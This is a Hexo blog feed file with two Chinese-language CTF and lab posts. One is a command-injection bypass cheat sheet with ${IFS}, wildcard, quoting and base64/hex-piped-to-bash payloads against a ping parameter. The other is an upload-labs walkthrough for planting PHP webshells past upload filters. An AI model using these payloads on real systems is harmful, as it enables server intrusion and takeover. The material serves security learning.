-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathatom.xml
More file actions
131 lines (69 loc) · 109 KB
/
atom.xml
File metadata and controls
131 lines (69 loc) · 109 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>Hexo</title>
<link href="http://example.com/atom.xml" rel="self"/>
<link href="http://example.com/"/>
<updated>2022-10-18T15:07:29.703Z</updated>
<id>http://example.com/</id>
<author>
<name>zi1ch</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>命令注入(Command Injection)</title>
<link href="http://example.com/2022/10/18/%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/"/>
<id>http://example.com/2022/10/18/%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/</id>
<published>2022-10-18T14:12:54.083Z</published>
<updated>2022-10-18T15:07:29.703Z</updated>
<content type="html"><![CDATA[<p>命令注入技巧总结</p><span id="more"></span><p>命令注入就是在需要输入数据的地方输入了恶意代码,而且系统并没有对其进行过滤或者其他处理导致恶意代码也被执行,最终导致数据泄露或者正常数据被破坏。</p><p><strong>常见的操作系统指令(简单举例)</strong></p><p>ipconfig,</p><p>net user(查看系统用户),</p><p>dir(查看当前目录),</p><p>find(查找包含指定字符的行),</p><p>whoami(查看系统当前有效用户名)</p><h3 id="命令行执行注入"><a href="#命令行执行注入" class="headerlink" title="命令行执行注入"></a>命令行执行注入</h3><p>A&B(简单的拼接,AB之间无制约关系),</p><p>A&&B(A执行成功才会执行B),</p><p>A|B(A的输出作为B的输入),</p><p>A||B(A执行失败,然后才会执行B)</p><p>在shell命令中<strong>Linux</strong>还定义了一个<code>";"</code>用于表示语句的结尾,可以将多条shell命令通过<code>";"</code>隔开(从左到右,不管是否失败顺序执行)</p><h3 id="规则验证绕过"><a href="#规则验证绕过" class="headerlink" title="规则验证绕过"></a>规则验证绕过</h3><h4 id="空格绕过"><a href="#空格绕过" class="headerlink" title="空格绕过"></a>空格绕过</h4><ul><li><p><code>${IFS}</code></p><blockquote><p>$IFS 是一种 set 变量,当 shell 处理”命令替换”和”参数替换”时,shell 根据 IFS 的值,默认是 space,tab, newline 即空格,制表符,空行来拆解读入的变量,然后对特殊字符进行处理,最后重新组合赋值给该变量。</p><p>直接用$IFS的话,会认为解析没结束,会把后面的也当做参数解析,比如cat$IFSflag.php,会把IFSflag一起当变量解析。这时候需要在$IFS后面进行截断,使解析为空,结束 $IFS,正常执行后面的内容。</p></blockquote><p><img src="/2022/10/18/%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/image-20221015231112097.png" alt="image-20221015231112097"></p></li><li><p><code>${IFS}$1</code></p></li><li><p><code>$IFS$1</code></p><p>$1指代第一个参数,下一图第一个参数为1.txt</p><p><img src="/2022/10/18/%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/image-20221015231245407.png" alt="image-20221015231245407"></p></li><li><p><code><和<></code></p></li><li><p><code>{cat,flag}</code></p><p><img src="/2022/10/18/%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/image-20221015232757231.png" alt="image-20221015232757231"></p></li><li><p><code>%20替换</code></p></li><li><p><code>%0a (换行)</code></p></li><li><p><code>%0d (回车)</code></p></li><li><p><code>%09 (tab)</code></p></li></ul><blockquote><p><strong>$num主要是起截断作用</strong></p><p>$0 就是编写的shell脚本本身的名字<br>$1 是在运行shell脚本传的第一个参数<br>$2 是在运行shell脚本传的第二个参数</p><p>$@表示所有参数<br>$#表示所有参数的个数</p></blockquote><h4 id="通配符绕过"><a href="#通配符绕过" class="headerlink" title="通配符绕过"></a>通配符绕过</h4><p>???在linux里面可以进行代替字母</p><p>/???/c?t flag.txt</p><p><em>在linux里面可以进行*<em>模糊匹配</em></em></p><p>cat flag.* *进行模糊匹配php</p><p><code>?</code>代表一个字符<code>*</code>代表一串字符</p><h4 id="黑名单-关键字)绕过"><a href="#黑名单-关键字)绕过" class="headerlink" title="黑名单(关键字)绕过"></a><strong>黑名单(关键字)绕过</strong></h4><ul><li><p>单引号、双引号绕过:<code>c"at"t fl''ag</code></p></li><li><p>反斜线绕过:<code>ca\t fl\ag</code> //绕过匹配特定字符串的过滤</p></li><li><p>和num和@绕过:<code>c$1at fl$@ag</code></p><blockquote><p>比如[GXYCTF 2019]Ping Ping Ping</p><p>构造了拼接:?ip=127.0.0.1;a=g;tac$IFS$1fla$a.php</p></blockquote></li><li><p>拼接绕过:<code>a=c;b=at;c=fl;d=ag; $a$b $c$d</code> (不用加|)</p></li><li><ul><li><p><code>/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php</code>或者</p></li><li><p><code>/?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php</code></p><p><strong>“|”管道符会把前面的输出结果作为后面的输入</strong></p></li></ul></li><li><p>base64:</p></li><li><ul><li><p><code>echo "Y2F0IGZsYWc="|base64 -d</code></p></li><li><p><code>echo "Y2F0IGZsYWc="|base64 -d|bash</code></p></li><li><p><code>|echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh</code></p><p><img src="/2022/10/18/%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/image-20221016002312506.png" alt="image-20221016002312506"></p></li></ul></li><li><p>hex编码绕过:</p></li><li><ul><li>```bash<br>echo “0x63617420666c61670a” | xxd -r -p|bash ==》cat /flag<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"> > xxd命令转换二[进制](https://so.csdn.net/so/search?q=进制&spm=1001.2101.3001.7020)文件为十六进制文件</span><br><span class="line"></span><br><span class="line">- oct编码绕过:</span><br><span class="line"></span><br><span class="line">- - `$(printf "\x63\x61\x74\x20\x66\x6c\x61\x67")`</span><br><span class="line"> - `{printf,"\x63\x61\x74\x20\x66\x6c\x61\x67"}|$0`</span><br><span class="line"></span><br><span class="line">#### **过滤一些读取文件的命令(如cat)**</span><br><span class="line"></span><br><span class="line">**绕过方法**</span><br><span class="line"></span><br><span class="line">```bash</span><br><span class="line">[root@kali flag123]# curl file:///flag123/flag</span><br><span class="line"> flag{suifeng}</span><br><span class="line"> [root@kali flag123]# strings flag </span><br><span class="line"> flag{suifeng}</span><br><span class="line"> [root@kali flag123]# uniq -c flag</span><br><span class="line"> 1 flag{suifeng}</span><br><span class="line"> [root@kali flag123]# bash -v flag</span><br><span class="line"> flag{suifeng}</span><br><span class="line"> flag: line 1: flag{suifeng}: command not found</span><br><span class="line"> [root@kali flag123]# rev flag //reverse</span><br><span class="line"> }gnefius{galf</span><br></pre></td></tr></table></figure></li></ul></li></ul><h4 id="绕过长度限制"><a href="#绕过长度限制" class="headerlink" title="绕过长度限制"></a>绕过长度限制</h4><p>Linux中的>符号和>>符号></p><p>>用来创建文件,每次使用创建了新文件会覆盖同名文件</p><p>>>符号的作用是将字符串添加到文件内容末尾,不会覆盖原内容</p><p><img src="/2022/10/18/%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/image-20221018220440541.png" alt="image-20221018220440541"></p><h4 id="内联绕过"><a href="#内联绕过" class="headerlink" title="内联绕过"></a><strong>内联绕过</strong></h4><p>大部分Unix shell以及编程语言如Perl、PHP以及Ruby等都以成对的重音符(反引号)作指令替代,意思是以某一个指令的输出结果作为另一个指令的输入项。</p><p>所谓内联绕过就是将<strong>反引号内命令的输出作为输入执行</strong>,比如系统对flag字符进行了过滤,那么我们可以通过ls命令将flag.php输出作为输入,有以下两种方式:</p><ul><li><code>?ip=127.0.0.1;cat 'ls'</code></li><li><code>?ip=127.0.0.1;cat $(ls)</code></li></ul><p>参考链接</p><p><a href="https://zhuanlan.zhihu.com/p/550877208">https://zhuanlan.zhihu.com/p/550877208</a></p><p><a href="https://blog.csdn.net/qq_54727981/article/details/125936528">https://blog.csdn.net/qq_54727981/article/details/125936528</a></p><p><a href="https://zhuanlan.zhihu.com/p/391439312">https://zhuanlan.zhihu.com/p/391439312</a></p><p><a href="https://blog.csdn.net/qq_53142368/article/details/116152477">https://blog.csdn.net/qq_53142368/article/details/116152477</a></p>]]></content>
<summary type="html"><p>命令注入技巧总结</p></summary>
<category term="note" scheme="http://example.com/tags/note/"/>
<category term="Command Injection" scheme="http://example.com/tags/Command-Injection/"/>
</entry>
<entry>
<title>upload-labs wp</title>
<link href="http://example.com/2022/07/18/upload-labs/"/>
<id>http://example.com/2022/07/18/upload-labs/</id>
<published>2022-07-18T15:05:58.000Z</published>
<updated>2022-07-18T16:25:22.525Z</updated>
<content type="html"><![CDATA[<p>文件上传靶场upload-labs wp</p><span id="more"></span><h3 id="pass-1:"><a href="#pass-1:" class="headerlink" title="pass 1:"></a>pass 1:</h3><p><img src="/2022/07/18/upload-labs/3def4310b3309a537f82d3689c8e42cd.png" alt="截图"></p><p> 要求是上传图片,利用上传图片上传webshell。应该是有进行一定过滤,规定上传文件格式为图片格式,也可以简单用一句话木马试一下。</p><p><img src="/2022/07/18/upload-labs/62831d7492edcffa9bc12542e1ed6a0e.png" alt="截图"></p><p> javaScript一般是运行在客户端的也就是本机,可以通过抓包修改文件后缀绕过</p><p> 把webshell的php文件更改后缀名上传通过js验证,再用bp改回复数据包里文件后缀,使得变成jpg文件的webshell在服务端以php文件执行</p><p><img src="/2022/07/18/upload-labs/a4f3cc976520c48f6d62d4808e0b16e6.png" alt="截图"></p><p> 蚁剑连入成功</p><p><img src="/2022/07/18/upload-labs/82a6649c6da5550e3ad18ea1f95de608.png" alt="截图"></p><p> 本地也可以看到上传成功</p><p><img src="/2022/07/18/upload-labs/c1a83a67e80362143e1c36ef40e42974.png" alt="截图"></p><p> 因为js是运行在前端的,我们也可以f12审计修改代码绕过</p><p><img src="/2022/07/18/upload-labs/64035f31476072e9e96aadf9dc8ca57c.png" alt="截图"></p><p> 可以看到验证机制的js代码,但是删除验证代码依然不行</p><p><img src="/2022/07/18/upload-labs/fa497de636adf33c8eb6bef4080d9f33.png" alt="截图"></p><p> 简单审阅一下,看到main函数提交表单时使用了检验的函数checkFile()</p><p> 删除后成功上传。</p><p> 利用BP自动去除js也可以,直接客户端对js实现禁用,服务端没有验证可以直接发送上传。</p><p> 有一个方法是修改js代码实现提交,需要刷新一下</p><br><h3 id="pass-2:"><a href="#pass-2:" class="headerlink" title="pass 2:"></a>pass 2:</h3><p><img src="/2022/07/18/upload-labs/6fdd2486ec53f64efdb880d667210a1b.png" alt="截图"></p><p> 第二题看上去和第一题差不多,F12看了没有js验证的代码,不过表单提交依旧调用checkFile函数</p><p> 上传php报错</p><p><img src="/2022/07/18/upload-labs/a203526c3c264e5b56cde0b4f4b9fdcf.png" alt="截图"></p><p> 抓包修改依旧成功</p><p><img src="/2022/07/18/upload-labs/a3f592ee7049bdb3ac5feaf446166130.png" alt="截图"></p><p><img src="/2022/07/18/upload-labs/5bb28713ae9a6b5da32e3bc42e2c7df7.png" alt="截图"></p><p> 查看源码,发现是对文件格式进行检查。$_FILES[‘myFile’][‘type’] 指的是文件的 MIME 类型,需要浏览器提供该信息的支持,例如”image/gif”。</p><p> 对应数据包中的Content-Type,绕过MIME类型验证即可</p><p><img src="/2022/07/18/upload-labs/120e3c0d889929a92f93400e69bca470.png" alt="截图"></p><img src="/2022/07/18/upload-labs/39ba67d36598637197466af0f5c8d8d1.png" alt="截图" style="zoom:100%;"><p> 改为image/jpeg(图片格式即可)</p><br><h3 id="pass-3:"><a href="#pass-3:" class="headerlink" title="pass 3:"></a>pass 3:</h3><p><img src="/2022/07/18/upload-labs/504a94b3bf361b313c4c1006297c4f61.png" alt="截图"></p><p> 前面的方法都不大行,看看源码</p><p><img src="/2022/07/18/upload-labs/18d2be3911d29f365fd429aca5e746f8.png" alt="截图"></p><p> 定义了黑名单,对于文件名进行一定过滤,检查了大小写以及删除点和空格,但是黑名单定义不完全,没有过滤掉php等文件的所有拓展名</p><p> 这黑名单的过滤操作也提供了一些绕过思路,比如hacktest.php. ; hacktest.PHP ; hacktest.php::$DATA ; hacktest.php (加空格)</p><p> 比如php文件有拓展名.php .phtml .phps .php5 .pht</p><p><img src="/2022/07/18/upload-labs/8058cbbd5ef1a1f41eaba006663c7e6c.png" alt="截图"></p><p> 直接上传成功</p><p><img src="/2022/07/18/upload-labs/ac6c591d0fa1c979b2b67ad1dd1de30f.png" alt="截图"></p><p> phpstudy默认环境下,无法解析php3、phtml等文件,需配置httpd-conf文件,不知道为什么还是不行,先跳过</p><p> 用phpstudy2018重搭靶场,重新配置可以连入</p><p><img src="/2022/07/18/upload-labs/caba9b9f0960fd8729a3f11193ec0059.png" alt="截图"></p><br><h3 id="pass-4:"><a href="#pass-4:" class="headerlink" title="pass 4:"></a>pass 4:</h3><p><img src="/2022/07/18/upload-labs/b00e70f995ceeda090463de2e9861711.png" alt="截图"></p><p> 这题是第三题升级版,回显不告诉过滤了哪些文件,过滤了大部分文件,但是没过滤.htaccess文件</p><p> .htaccess文件( 全称 “分布式配置文件” ),英文全称 Hypertext Access (超文本入口)。提供了针对目录改变配置的方法, 即在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过 Apache 的 AllowOverride 指令来设置。</p><p> 简单来说他是apache的配置文件,满足“1.Allow Override All;2.LoadModule rewrite_module modules/mod_rewrite.so #rewrite模块为开启状态。”两个条件后可以上传.hataccess文件修改配置</p><p> .hataccess文件全称就是.hataccess,不能是1.hataccess之类的,否则无法解析,被重命名也会无法解析</p><p>这里我们可以配置为jpg文件作为php文件解析</p><p> </p><p> 先修改一下httpd.conf</p><p><img src="/2022/07/18/upload-labs/5d9c7ad4b7f4ca212d9f5d6b5287ae17.png" alt="截图"></p><p> .htaccess文件内容为AddType application/x-httpd-php .jpg,意为把jpg文件都当作php文件执行,也可以不加.jpg,AddType application/x-httpd-php就是把所有文件当作php文件执行</p><p> 上传成功后还是无法使用</p><p><img src="/2022/07/18/upload-labs/fa38adee9a423b8e5d230dbaa4de18f6.png" alt="截图"></p><p> 发现小皮面板中 php 版本 是nts 意思是即非线程安全,不提供数据访问保护 不支持使用 .htaccess</p><p> </p><p> 重新下载搭建靶场可连</p><p><img src="/2022/07/18/upload-labs/d04a8412671eed1ebcb6f4b8c07bc3e1.png" alt="截图"></p><p><img src="/2022/07/18/upload-labs/6173f9497b78197f879ae9ee61946e26.png" alt="截图"></p><h3 id="pass-5:"><a href="#pass-5:" class="headerlink" title="pass 5:"></a>pass 5:</h3><p> 简单尝试了一下,把htaccess也ban了</p><p> 看看源码,发现比原来的检查少了个大小写的转换验证,试试能不能绕过</p><p><img src="/2022/07/18/upload-labs/4bfa44bbe2b5e539f51c7fe161e8601b.png" alt="截图"></p><p> 验证的检验机制都是根据windows创建文件的特性来的,比如忽略大小写,省略末尾的点</p><p> 能传能连</p><p><img src="/2022/07/18/upload-labs/49fccb75e48b370d97ac933bf1f1ccec.png" alt="截图"></p><h3 id="pass-6:"><a href="#pass-6:" class="headerlink" title="pass 6:"></a>pass 6:</h3><p> 根据pass 3的一些启发不看源代码做黑盒测试,其中一些检验绕过是要Burpsuite上进行的,比如后缀名加.加空格,这些windows创建文件是会自动处理的东西直接在本地修改后缀名也会被处理掉</p><p><img src="/2022/07/18/upload-labs/325429cf04ee4a721ad96f78e10ba84f.png" alt="截图"></p><p> 加入空格成功绕过</p><br><h3 id="pass-7:"><a href="#pass-7:" class="headerlink" title="pass 7:"></a>pass 7:</h3><p> 又回归到上传图片了</p><p> 试试制作个图片马上传</p><p><img src="/2022/07/18/upload-labs/3c935c3c25d3623a5b42aa6652caed0c.png" alt="截图"></p><p> 传上了连不上</p><p> 后边还是测试了一下,发现想复杂了还是后缀的绕过</p><p> 这次是没有对.进行验证</p><p> BP修改直接过</p><p><img src="/2022/07/18/upload-labs/f2362c7e18f2044d22ff24f72dc2b03b.png" alt="截图"></p><br><h3 id="pass-8:"><a href="#pass-8:" class="headerlink" title="pass 8:"></a>pass 8:</h3><p> 依旧试试后缀绕过</p><p> 在window的时候如果文件名+”::$DATA”会把::$DATA之后的数据当成文件流处理,不会检测后缀名,且保持::$DATA之前的文件名,他的目的就是不检查后缀名</p><p> 根据之前考点直接试试是不是没检查流,一次过</p><h3 id="pass-9:"><a href="#pass-9:" class="headerlink" title="pass 9:"></a>pass 9:</h3><p><img src="/2022/07/18/upload-labs/ab67a58bc763dd1dabbbd00237b683cb.png" alt="截图"></p><p> 看看源码</p><p><img src="/2022/07/18/upload-labs/d39d40d3be3068a080d6970a767cf6ff.png" alt="截图"></p><p> 把所有东西过滤了,但是根据验证次序,我们可以简单构造绕过,毕竟只是一次验证</p><p> 开局先去末尾的点,大小写转换掉了,代表流的::$DATA也替换为空格,最后首尾去空</p><p> 可以弄个. . 绕过直接过</p><p><img src="/2022/07/18/upload-labs/331eb8f69a5d8add6274195c4caa7933.png" alt="截图"></p><p><img src="/2022/07/18/upload-labs/3f722c6d3ba2079deef3cb7c94636f1c.png" alt="截图"></p><h3 id="pass-10:"><a href="#pass-10:" class="headerlink" title="pass 10:"></a>pass 10:</h3><p> 设计上传文件为.php. .,成功上传却用蚁剑连接不了</p><p> 查看一下,把文件后缀给删掉了</p><p><img src="/2022/07/18/upload-labs/a3284e4ea54f8d38fd2aed84d646b1f5.png" alt="截图"></p><p> 看一下源码</p><p><img src="/2022/07/18/upload-labs/756142933017cec497ecaec8824e5408.png" alt="截图"></p><p> 主要在中间两句过滤,把黑名单里的后缀名全变为空字符,trim就是去一下文件名两边有空格之类的东西</p><p><img src="/2022/07/18/upload-labs/f43a4a6493afeec7c64947cac3fd2fe5.png" alt="截图"></p><p> 可以利用它的删除构造个.pphphp,不循环只进行一次的话从左到右先删除了1个php剩下的还是php</p><p> 也可以写个phtmlhp方便理解一下</p><p><img src="/2022/07/18/upload-labs/59d1df1f50d26f9c428c11b6440161e8.png" alt="截图"></p><p> 成功连接</p><p><img src="/2022/07/18/upload-labs/3c3987d5e59cda393afb5ba525310d61.png" alt="截图"></p><br><h3 id="pass-11:"><a href="#pass-11:" class="headerlink" title="pass 11:"></a>pass 11:</h3><p> 简单上传一个图片发现文件名变了,变为与时间有关的文件名</p><p><img src="/2022/07/18/upload-labs/1afa10113fac9c386684f1cc63a1d1c6.png" alt="截图"></p><p><img src="/2022/07/18/upload-labs/05a968a5c04dc1e3b28803412daa2b93.png" alt="截图"></p><p> <del>这代表我们不能用原文件名来登录连接</del></p><p> 它提示说路径可控,仔细看一下源码</p><p><img src="/2022/07/18/upload-labs/34e14cf707d7f60149224c9c4e736154.png" alt="截图"></p><p> 它是用get获取的,get是通过url中?后面部分来获取一些参数</p><p> 我们可以利用url编码%00的截断实现上传路径控制不被改名</p><p><img src="/2022/07/18/upload-labs/66c9f62fa7a03f00c87d1eeb6954b016.png" alt="截图"></p><p> 要修改两个地方,一个是文件后缀绕过验证,一个是url路径进行编码后截断字符串以读入文件</p><p> 但有个问题版本 PHP版本得小于5.3版本才能用这个%00截断get请求里的字符串,而且配置文件php.ini的magic_quotes_gpc为OFF状态</p><p> 我的php版本是5.4.45,稍微改一下,而且要修改配置文件</p><p><img src="/2022/07/18/upload-labs/7d12079d2424a1694fde656d75c829bb.png" alt="截图"></p><p><img src="/2022/07/18/upload-labs/2e7707ce1db0c5119e5af3a1cc76327f.png" alt="截图"></p><p> 成功</p><p><img src="/2022/07/18/upload-labs/ee75e5411cc1792f55a7e4100127e267.png" alt="截图"></p><p><img src="/2022/07/18/upload-labs/b0e059558c9c0a56c539878180a4dbf4.png" alt="截图"></p><br><h3 id="pass-12:"><a href="#pass-12:" class="headerlink" title="pass 12:"></a>pass 12:</h3><p> 没看提示了源码先看看数据包</p><p><img src="/2022/07/18/upload-labs/2e5b2562474829a9283712452b2aa3e9.png" alt="截图"></p><p> 改为post传入了,其他机制应该和上题差不多</p><p> 一样用%00截断save_path,问题在于%00不能直接改在url后url编码后截断了,考虑修改hex值</p><p> 直接用bp解码发送</p><p><img src="/2022/07/18/upload-labs/6df82deb9f9bb38ccc8c858c321601ac.png" alt="截图"></p><p> 也可以修改hex值,用表示空格的+号标记一下位置,修改</p><p><img src="/2022/07/18/upload-labs/e4a4be5a5604c84e037c87dfba516c78.png" alt="截图"></p><p> 一些常见的特殊符号的url编码</p><p><img src="/2022/07/18/upload-labs/67a1e1a1ec604581dca2edc1551fa3a7.png" alt="截图"></p><p> 连入成功</p><p><img src="/2022/07/18/upload-labs/f96e5ea30c96680eba403c400f33b8bc.png" alt="截图"></p><br><h3 id="pass-13:"><a href="#pass-13:" class="headerlink" title="pass 13:"></a>pass 13:</h3><p> 一开始想的太简单,以为制作了图片马后上传就可以和之前一样蚁剑连入</p><p> 要能使用图片马需要服务器端要有文件包含漏洞,才能解析图片运行恶意代码</p><p> 解题步骤就是上传图片马,找到图片马的绝对路径,之后利用文件包含漏洞把图片马当作php文件执行解析以运行恶意代码getshell</p><p> 由于题目本身没给文件包含漏洞文件,找了一个文件包含漏洞放到upload目录</p><p><img src="/2022/07/18/upload-labs/1927bf4a13fc7ee7e8e90084ce121858.png" alt="截图"></p><p> 能实现文件包含以及绝对路径显示</p><p> 上传成功后按F12可以看到上传后的文件名</p><p><img src="/2022/07/18/upload-labs/0805528305bb2bfd1b16efd32d229ceb.png" alt="截图"></p><p> 利用文件包含漏洞getshell</p><p><img src="/2022/07/18/upload-labs/f662bb272c241d31328c67ae0bc04e48.png" alt="截图"></p><p><img src="/2022/07/18/upload-labs/761ca8e344f2f2b82e63b78457122134.png" alt="c1811595c2a04d91a24bd353bfc08a8f.png"></p><p><img src="/2022/07/18/upload-labs/9945157fe3843e25af23816a02a158aa.png" alt="截图"></p><p> 一直运行报错,后面解决了要把php改到支持 PHP 版本改到PHP5.3及以上 </p><p><img src="/2022/07/18/upload-labs/8cf77261ed54a2b4270f595725dbc219.png" alt="截图"></p><p><img src="/2022/07/18/upload-labs/d7b23e322d5018a2f164837df349576d.png" alt="截图"></p><br><p> 这个靶场很奇怪自己推荐5.2.17,这题不能用这个版本,折磨了我巨久这个问题,还以为图片马没写对</p><p><img src="/2022/07/18/upload-labs/6ff0934ce708dd9c2c818a333bd4499d.png" alt="截图"></p><br><h3 id="pass-14:"><a href="#pass-14:" class="headerlink" title="pass 14:"></a>pass 14:</h3><p><img src="/2022/07/18/upload-labs/ea274c1ef35cbf844db10d0342b53994.png" alt="截图"></p><p>getimagesize()<br> 这个函数功能会对目标文件的16进制去进行一个读取,去读取头几个字符串是不是符合图片的要求的</p><p> 和上题一样构造的图片马php代码在最后,上题只读前面两个字符,这题多读几个,问题差别不是特别大,应该能上传成功</p><p> 不知道为什么连正常图片都上传不了,跳过</p><br><h3 id="pass-15:"><a href="#pass-15:" class="headerlink" title="pass 15:"></a>pass 15:</h3><p> 依旧上传和之前一样的图片马</p><p><img src="/2022/07/18/upload-labs/4b5473e7e08d6676d145039ea735248c.png" alt="截图"></p><p> 依旧过</p><p><img src="/2022/07/18/upload-labs/df711024141652ecba48fce80aff3d60.png" alt="截图"></p><p> 做完看一下这题有什么新的东西</p><p><img src="/2022/07/18/upload-labs/3c887073a6817854dcbb8bb47c7c5b11.png" alt="截图"></p><p>exif_imagetype()?</p><p> 需要配置php exif模块</p><p><img src="/2022/07/18/upload-labs/880810d1da4f2f47f59eb3cff05df0af.png" alt="截图"></p><br><h3 id="pass-16:"><a href="#pass-16:" class="headerlink" title="pass 16:"></a>pass 16:</h3><p><img src="/2022/07/18/upload-labs/d858d9caacc32ef6bd70886a9d3418aa.png" alt="截图"></p><p> 成功上传但是连不上了</p><p><img src="/2022/07/18/upload-labs/853dd2bae62af61c1c69d2f573b9d917.png" alt="截图"></p><p> 重新渲染了图片,是图片马最后的php代码没弄没了吗?</p><p> notepad查看确实没了,但是图片依旧展示内容相同,猜测只是改了一小部分或者就是尾部,思路是找找没有被渲染掉的部分写入php代码</p><p><img src="/2022/07/18/upload-labs/3e5233a9b8b4e513c719e64dd6059fa6.png" alt="截图"></p><p> 比较发现是大部分改变了,但是有一小部分没变可以写入php(白色部分)</p><p><img src="/2022/07/18/upload-labs/30b192ba194e8d8369d189f317eb8317.png" alt="截图"></p><p> 修改</p><p><img src="/2022/07/18/upload-labs/ab54d6268b5e240aaa18760eb112c112.png" alt="截图"></p><p><img src="/2022/07/18/upload-labs/92456f7aba9d81b0fa02931720c3ca9e.png" alt="截图"></p><p> 还是不行,后来发现我想的太简单了,相同那一块不一定是不变的,可能是由相同数据覆盖。</p><p> 三种文件的二次渲染绕过都不一样,了解一下二次渲染漏洞</p><p> 在我们上传文件后,网站会对图片进行二次处理(格式、尺寸要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片并放到网站对应的标签进行显示。</p><p> 主要进行二次渲染的源代码为</p><p><img src="/2022/07/18/upload-labs/34c1d857362801c195941056ab94a89b.png" alt="截图"></p><p> gif,png,jpg生成新图片的代码都类似,但根据文件格式不同要采用不同的绕过方法</p><p> gif最简单,和我一开始思路一样,找不同,gif基本都没变,只有后面抹去了一些部分</p><p><img src="/2022/07/18/upload-labs/0f26afc2b3352c0434a149cb3208371a.png" alt="截图"></p><p> 修改在没变的部分试试,不管替换还是插入我尝试了php代码都有变</p><p><img src="/2022/07/18/upload-labs/f06aa3b905b90ef6ae6e6493dd032cd7.png" alt="截图"></p><p> 尝试多次,终于这次下载下来后winhex查看发现php代码不变还存在</p><p><img src="/2022/07/18/upload-labs/1dce88c29dbafce8a584b3baef28dc24.png" alt="截图"></p><p> 成功!</p><p><img src="/2022/07/18/upload-labs/a3e773e87a59157ec11a903751ff1882.png" alt="截图"></p><p> png就麻烦多了</p><p> png图片由<strong>3个以上的数据块</strong>组成。</p><p> PNG定义了<strong>两种类型的数据块</strong>,一种是称为关键数据块(critical chunk),这是标准的数据块,另一种叫做辅助数据块(ancillary chunks),这是可选的数据块。</p><p> **关键数据块定义了3个标准数据块(IHDR,IDAT, IEND)**,每个PNG文件都必须包含它们。</p><p><img src="/2022/07/18/upload-labs/4ddec4f3ef58d4140f9dd6fd30867617.png" alt="截图"></p><p> 主要写入代码是写到PLTE和IDAT这两块去的:</p><p> 写入PLTE主要是要用脚本计算出插入php代码后的crc值并手动替换</p><p> 要找索引彩色图片,找了几张不是,以后再补</p><p><img src="/2022/07/18/upload-labs/0163b9c4858fbc44b10d2228917413aa.png" alt="截图"></p><p>IDAT的结构不是很了解,有现成的脚本使用</p><p><img src="/2022/07/18/upload-labs/1f4e441efc31dc9ac8315383f89cd65a.png" alt="截图"></p><p> 这个脚本生成的文件为aba.png</p><p> 生成完从一个好好的图片变为黑乎乎一张图片<img src="/2022/07/18/upload-labs/aca12eed10440cdc7f150f9442e5e880.png" alt="截图"></p><br><p><img src="/2022/07/18/upload-labs/f0f9112c51763cf9581b288d01e60ccc.png" alt="截图"></p><p> 下载下来不变,成功绕过,但不知道具体怎么用,猜测是get传参时写入@eval,post传参写入密码getshell?</p><p><img src="/2022/07/18/upload-labs/4bab024546f2e9261fcc74b18ab1d37d.png" alt="截图"></p><p> jpg也是利用脚本处理</p><p> 由于jpg图片易损,对图片的选取有很大关系,很容易制作失败,需要多选取几张图片进行生成。</p><p> 可以写入phpinfo,不知道为什么一句话木马写进去制作时报错,好像是和引号有关</p><p><img src="/2022/07/18/upload-labs/4e80458fb5872a86f092dde67eef7d46.png" alt="截图"></p><p> 成功</p><p><img src="/2022/07/18/upload-labs/eb2bd79aaa0844340a7375c57c0b332f.png" alt="截图"></p><br><h3 id="pass-17:"><a href="#pass-17:" class="headerlink" title="pass 17:"></a>pass 17:</h3><p><img src="/2022/07/18/upload-labs/bae494818b93d13437609c51bca8211d.png" alt="截图"></p><p> 直接要求我们对代码审计,解题就从代码下手</p><p><img src="/2022/07/18/upload-labs/77f1f25dbd799920398efef9eaa742e1.png" alt="截图"></p><p> 代码很简单,先对文件名提取信息但未验证,之后上传,上传完改名,unlink删除源文件。如果是非法文件也是上传到服务器后再删除</p><p> 有个简单方法就是直接图片马,可以getshell</p><p><img src="/2022/07/18/upload-labs/4947487161a84c4830bda39a2c972380.png" alt="截图"></p><p> 但考点应该不在这</p><p> 因为任意文件都可以上传,可以利用条件竞争漏洞,立刻访问该非法文件,访问成功就不可删除。</p><p>关于条件竞争</p><p> 什么是条件竞争上传,条件竞争上传是一种服务器端的漏洞,由于后端程序操作逻辑不合理导致。<br>由于服务器端在处理不同用户的请求时是并发进行的,因此,如果并发处理不当或相关操作逻辑顺序设计的不合理时,将会导致此类问题的发生,此漏洞一般发生在多个线程同时访问同一个共享代码、变量、文件等没有进行锁操作或者同步操作的场景中。</p><p> 